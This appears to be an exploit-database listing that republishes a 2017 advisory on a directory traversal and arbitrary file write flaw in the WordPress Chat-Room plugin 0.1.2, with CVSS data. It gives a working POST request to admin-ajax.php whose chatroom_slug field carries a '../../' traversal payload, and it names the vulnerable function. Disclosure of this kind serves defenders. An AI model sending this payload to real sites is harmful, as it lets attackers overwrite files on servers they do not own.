Advertisement






WordPress Chat-Room plugin v0.1.2 directory traversal/arbitrary file write

CVE Category Price Severity
CWE-22 Variable High
Author Risk Exploitation Type Date
Unknown High Remote 2017-03-13
CPE
cpe:cpe:/a:wordpress:chat-room-plugin:0.1.2
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017030129

Below is a copy:

WordPress Chat-Room plugin v0.1.2 directory traversal/arbitrary file write# Exploit Title: WordPress Chat-Room plugin v0.1.2 directory traversal/arbitrary file write
# Date: 2017-03-08
# Exploit Author: malwrforensics
# Vendor Homepage: https://webdevstudios.com/
# Software Link: https://wordpress.org/plugins/chat-room/
# Version: 0.1.2
# Tested on: WordPress 4.7.3, Ubuntu 16.04.2 LTS

#Folder used by the Chat-room plugin:
http://<server>/wp-content/uploads/chatter/

#POST http://<server>/wp-admin/admin-ajax.php HTTP/1.1
#...
#Referer: http://<server>/chat-room/<chat_name/
#...
#
#action=send_message&chatroom_slug=../../<new_path_and_file>&message=test

#Vulnerable file: chat-room.php
#function save_message():
#  - the $chatroom_slug parameter is not sanitized
#  - the log_filename parameters receives the value of $chatroom_slug
#  - the write_log_file function is called which will do an
fopen($log_filename, 'w')

Thanks.


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum